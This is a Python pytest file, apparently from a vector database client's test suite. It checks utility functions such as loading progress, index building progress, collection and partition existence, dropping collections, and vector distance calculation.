@pytest.mark.tags(CaseLabel.L1)
def test_loading_progress_not_existed_collection_name(self):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "describe collection failed: can't find collection"}
self.utility_wrap.loading_progress("not_existed_name", check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #677")
def test_loading_progress_invalid_partition_names(self, get_invalid_partition_names):
"""
target: test loading progress with invalid partition names
method: input invalid partition names
expected: raise an exception
"""
collection_w = self.init_collection_general(prefix)[0]
partition_names = get_invalid_partition_names
err_msg = {ct.err_code: 0, ct.err_msg: "`partition_name_array` value {} is illegal".format(partition_names)}
collection_w.load()
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("partition_names", [[ct.default_tag], [ct.default_partition_name, ct.default_tag]])
def test_loading_progress_not_existed_partitions(self, partition_names):
"""
target: test loading progress with not existed partitions
method: input all or part not existed partition names
expected: raise exception
"""
collection_w = self.init_collection_general(prefix)[0]
log.debug(collection_w.num_entities)
collection_w.load()
err_msg = {ct.err_code: 1, ct.err_msg: f"partitionID of partitionName:{ct.default_tag} can not be found"}
self.utility_wrap.loading_progress(collection_w.name, partition_names,
check_task=CheckTasks.err_res, check_items=err_msg)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_collection_not_existed(self):
"""
target: test wait for loading
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_loading_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_for_loading_partition_not_existed(self):
"""
target: test wait for loading
method: input partition not created before
expected: raise exception
"""
self._connect()
collection_w = self.init_collection_wrap()
self.utility_wrap.wait_for_loading_complete(
collection_w.name, partition_names=[ct.default_tag],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: f'partitionID of partitionName:{ct.default_tag} can not be find'})
def test_drop_collection_not_existed(self):
"""
target: test dropping a collection that does not exist
method: drop a collection that was never created
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
error = {ct.err_code: 0, ct.err_msg: "describe collection failed: can't find collection:"}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_left_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(invalid_vector, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_left value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_type(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors type
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if not isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_right_vector_invalid_value(self, get_invalid_vector_dict):
"""
target: test calculated distance with invalid vectors
method: input invalid vectors value
expected: raise exception
"""
self._connect()
invalid_vector = get_invalid_vector_dict
vector = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vector}
if isinstance(invalid_vector, dict):
self.utility_wrap.calc_distance(op_l, invalid_vector,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "vectors_right value {} "
"is illegal".format(invalid_vector)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_type(self, get_support_metric_field, get_invalid_metric_type):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_type
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "params value {{'metric': {}}} "
"is illegal".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_metric_value(self, get_support_metric_field, get_invalid_metric_value):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_invalid_metric_value
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_not_support_metric(self, get_support_metric_field, get_not_support_metric):
"""
target: test calculated distance with invalid metric
method: input invalid metric
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
metric = get_not_support_metric
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "{} metric type is invalid for "
"float vector".format(metric)})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_invalid_using(self, get_support_metric_field):
"""
target: test calculated distance with invalid using
method: input invalid using
expected: raise exception
"""
self._connect()
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
using = "empty"
self.utility_wrap.calc_distance(op_l, op_r, params, using=using,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_not_match_dim(self):
"""
target: test calculated distance with invalid vectors
method: input two sets of vectors with mismatched dimensions
expected: raise exception
"""
self._connect()
dim = 129
vector_l = cf.gen_vectors(default_nb, default_dim)
vector_r = cf.gen_vectors(default_nb, dim)
op_l = {"float_vectors": vector_l}
op_r = {"float_vectors": vector_r}
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Cannot calculate distance between "
"vectors with different dimension"})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_collection_before_load(self, get_support_metric_field):
"""
target: test calculated distance when entities is not ready
method: calculate distance before load
expected: raise exception
"""
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb,
is_index=True)
middle = len(insert_ids) // 2
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
metric_field = get_support_metric_field
params = {metric_field: "L2", "sqrt": True}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection {} was not "
"loaded into memory)".format(collection_w.name)})
class TestUtilityBase(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=[True, False])
def sqrt(self, request):
yield request.param
@pytest.fixture(scope="function", params=["L2", "IP"])
def metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["HAMMING", "TANIMOTO"])
def metric_binary(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
cw = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(cw.name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_not_created(self):
"""
target: test has_collection with collection name which is not created
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
_ = self.init_collection_wrap()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_after_drop(self):
"""
target: test has_collection with collection name dropped before
method: input random collection name
expected: False
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_collection(c_name)
assert res is True
cw.drop()
res, _ = self.utility_wrap.has_collection(c_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_partition(self):
"""
target: test has_partition with partition name
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_not_created(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name not created before
expected: False
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_after_drop(self):
"""
target: test has_partition with partition name
method: input collection name, and partition name dropped
expected: True before drop, False after drop
"""
c_name = cf.gen_unique_str(prefix)
p_name = cf.gen_unique_str()
cw = self.init_collection_wrap(name=c_name)
pw = self.init_partition_wrap(cw, p_name)
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is True
pw.drop()
res, _ = self.utility_wrap.has_partition(c_name, p_name)
assert res is False
@pytest.mark.tags(CaseLabel.L2)
def test_has_default_partition(self):
"""
target: test has_partition with '_default' partition
method: input collection name and partition name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.has_partition(c_name, ct.default_partition_name)
assert res is True
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
res, _ = self.utility_wrap.list_collections()
assert c_name in res
# TODO: make sure all collections deleted
@pytest.mark.tags(CaseLabel.L1)
def _test_list_collections_no_collection(self):
"""
target: test list_collections
method: no collection created, list_collections
expected: length of the result equals to 0
"""
self._connect()
res, _ = self.utility_wrap.list_collections()
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_not_existed(self):
"""
target: test building_process
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.index_building_progress(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_empty(self):
"""
target: test building_process
method: input empty collection
expected: no exception raised
"""
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
self.index_wrap.init_index(cw.collection, default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_insert_no_index(self):
"""
target: test building_process
method: insert 1 entity, no index created
expected: no exception raised
"""
nb = 1
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
error = {ct.err_code: 1, ct.err_msg: "no index is created"}
self.utility_wrap.index_building_progress(c_name, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_index(self):
"""
target: test building_process
method: 1.insert 1024 (because minSegmentSizeToEnableIndex=1024)
2.build(server does create index) and call building_process
expected: indexed_rows=0
"""
nb = 1024
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res['indexed_rows'] == 0
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_collection_indexing(self):
"""
target: test building_process
method: 1.insert 2048 entities to ensure that server will build
2.call building_process during building
expected: 2048 or fewer entities indexed
"""
nb = 2048
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.index_building_progress(c_name)
assert (0 < res['indexed_rows'] <= nb)
assert res['total_rows'] == nb
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_not_existed(self):
"""
target: test wait_index
method: input collection not created before
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.utility_wrap.wait_for_index_building_complete(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "can't find collection"})
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_empty(self):
"""
target: test wait_index
method: input empty collection
expected: no exception raised
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
cw.create_index(default_field_name, default_index_params)
assert self.utility_wrap.wait_for_index_building_complete(c_name)[0]
res, _ = self.utility_wrap.index_building_progress(c_name)
exp_res = {'total_rows': 0, 'indexed_rows': 0}
assert res == exp_res
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_collection_index(self):
"""
target: test wait_index
method: insert 5000 entities, build and call wait_index
expected: 5000 entity indexed
"""
nb = 5000
c_name = cf.gen_unique_str(prefix)
cw = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb)
cw.insert(data=data)
cw.create_index(default_field_name, default_index_params)
res, _ = self.utility_wrap.wait_for_index_building_complete(c_name)
assert res is True
res, _ = self.utility_wrap.index_building_progress(c_name)
assert res["indexed_rows"] == nb
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_without_loading(self):
"""
target: test loading progress without loading
method: insert and flush data, call loading_progress without loading
expected: loaded entities is 0
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.parametrize("nb", [ct.default_nb, 5000])
def test_loading_progress_collection(self, nb):
"""
target: test loading progress
method: 1.insert flush and load 2.call loading_progress
expected: all entities are loaded, because load is synchronous
"""
# create, insert default_nb, flush and load
collection_w = self.init_collection_general(prefix, insert_data=True, nb=nb)[0]
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_total_entities] == nb
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L1)
@pytest.mark.xfail(reason="pymilvus issue #702")
def test_loading_progress_with_async_load(self):
"""
target: test loading progress with async collection load
method: 1.load collection with async=True 2.loading_progress
expected: loading part entities
"""
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data()
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load(_async=True)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert (0 < res[num_loaded_entities] <= ct.default_nb)
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_empty_collection(self):
"""
target: test loading_progress on an empty collection
method: 1.create collection and no insert 2.loading_progress
expected: 0 entities is loaded
"""
collection_w = self.init_collection_wrap()
collection_w.load()
res, _ = self.utility_wrap.loading_progress(collection_w.name)
exp_res = {num_loaded_entities: 0, num_total_entities: 0}
assert exp_res == res
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_after_release(self):
"""
target: test loading progress after release
method: insert data, load the collection, release it, then call loading_progress
expected: loaded entities is 0
"""
collection_w = self.init_collection_general(prefix, insert_data=True)[0]
collection_w.release()
exp_res = {num_loaded_entities: 0, num_total_entities: ct.default_nb}
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res == exp_res
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_release_partition(self):
"""
target: test loading progress after release part partitions
method: 1.insert data into two partitions and flush
2.load collection and release one partition
expected: loaded one partition entities
"""
half = ct.default_nb
# insert entities into two partitions, collection flush and load
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
partition_w.release()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L2)
def test_loading_progress_with_load_partition(self):
"""
target: test loading progress after load partition
method: 1.insert data into two partitions and flush
2.load one partition and loading progress
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
collection_w.release()
partition_w.load()
res = self.utility_wrap.loading_progress(collection_w.name)[0]
assert res[num_total_entities] == half * 2
assert res[num_loaded_entities] == half
@pytest.mark.tag(CaseLabel.L1)
def test_loading_progress_with_partition(self):
"""
target: test loading progress with partition
method: 1.insert data into two partitions and flush, and load
2.loading progress with one partition
expected: loaded one partition entities
"""
half = ct.default_nb
collection_w, partition_w, _, _ = self.insert_entities_into_two_partitions_in_half(half)
res = self.utility_wrap.loading_progress(collection_w.name, partition_names=[partition_w.name])[0]
assert res[num_total_entities] == half
assert res[num_loaded_entities] == half
@pytest.mark.tags(CaseLabel.L1)
def test_wait_loading_collection_empty(self):
"""
target: test wait_for_loading
method: input empty collection
expected: no exception raised
"""
self._connect()
cw = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
cw.load()
self.utility_wrap.wait_for_loading_complete(cw.name)
res, _ = self.utility_wrap.loading_progress(cw.name)
exp_res = {num_total_entities: 0, num_loaded_entities: 0}
assert res == exp_res
@pytest.mark.xfail(reason="pymilvus issue #702")
@pytest.mark.tag(CaseLabel.L1)
def test_wait_for_loading_complete(self):
"""
target: test wait for loading collection
method: insert 6000 entities, load asynchronously, and wait for loading complete
expected: after loading completes, loaded entities is 6000
"""
nb = 6000
collection_w = self.init_collection_wrap()
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
assert collection_w.num_entities == nb
collection_w.load(_async=True)
self.utility_wrap.wait_for_loading_complete(collection_w.name)
res, _ = self.utility_wrap.loading_progress(collection_w.name)
assert res[num_loaded_entities] == nb
@pytest.mark.tag(CaseLabel.L0)
def test_drop_collection(self):
"""
target: test utility drop collection by name
method: input collection name and drop collection
expected: collection is dropped
"""
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
def test_drop_collection_repeatedly(self):
"""
target: test drop collection repeatedly
method: 1.collection.drop 2.utility.drop_collection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
collection_w.drop()
assert not self.utility_wrap.has_collection(c_name)[0]
error = {ct.err_code: 1, ct.err_msg: {"describe collection failed: can't find collection:"}}
self.utility_wrap.drop_collection(c_name, check_task=CheckTasks.err_res, check_items=error)
def test_drop_collection_create_repeatedly(self):
"""
target: test repeatedly create and drop same name collection
method: repeatedly create and drop collection
expected: no exception
"""
from time import sleep
loops = 3
c_name = cf.gen_unique_str(prefix)
for _ in range(loops):
self.init_collection_wrap(c_name)
assert self.utility_wrap.has_collection(c_name)[0]
self.utility_wrap.drop_collection(c_name)
assert not self.utility_wrap.has_collection(c_name)[0]
sleep(1)
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_default(self):
"""
target: test calculated distance with default params
method: calculated distance between two random vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors")
self.utility_wrap.calc_distance(op_l, op_r,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_sqrt(self, metric_field, metric):
"""
target: test calculated distance with default param
method: calculated distance with default sqrt
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default sqrt")
params = {metric_field: metric}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_default_metric(self, sqrt):
"""
target: test calculated distance with default param
method: calculated distance with default metric
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default metric")
params = {"sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_binary_metric(self, metric_field, metric_binary):
"""
target: test calculate distance with binary vectors
method: calculate distance between binary vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
nb = 10
raw_vectors_l, vectors_l = cf.gen_binary_vectors(nb, default_dim)
raw_vectors_r, vectors_r = cf.gen_binary_vectors(nb, default_dim)
op_l = {"bin_vectors": vectors_l}
op_r = {"bin_vectors": vectors_r}
log.info("Calculating distance for binary vectors")
params = {metric_field: metric_binary}
vectors_l = raw_vectors_l
vectors_r = raw_vectors_r
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric_binary})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_from_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: both left and right vectors are from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
log.info("Creating vectors from collections for distance calculation")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
log.info("Creating vectors for entities")
params = {metric_field: metric, "sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_collections(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from collections
method: calculated distance between entities from two collections
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
prefix_1 = "utility_distance"
log.info("Creating two collections")
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
collection_w_1, vectors_1, _, insert_ids_1, _ = self.init_collection_general(prefix_1, True, nb)
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors_1[0].loc[:, default_field_name]
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids, "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids_1, "collection": collection_w_1.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance for entities from two collections")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set left vectors as random vectors, right vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = cf.gen_vectors(nb, default_dim)
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
op_l = {"float_vectors": vectors_l}
log.info("Extracting entities from collections for distance calculating")
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between vectors and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set right vectors as random vectors, left vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = cf.gen_vectors(nb, default_dim)
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between right vector and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from one partition entities
method: both left and right vectors are from partition
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
log.info("Extracting entities from partitions for distance calculating")
vectors_l = vectors[i].loc[:, default_field_name]
vectors_r = vectors[i].loc[:, default_field_name]
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculating distance between entities from one partition")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partitions(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from partitions
method: calculate distance between entities from two partitions
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors[1].loc[:, default_field_name]
log.info("Extract entities from two partitions for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"partition": partitions[0].name, "field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"partition": partitions[1].name, "field": default_field_name}
log.info("Calculate distance between entities from two partitions")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
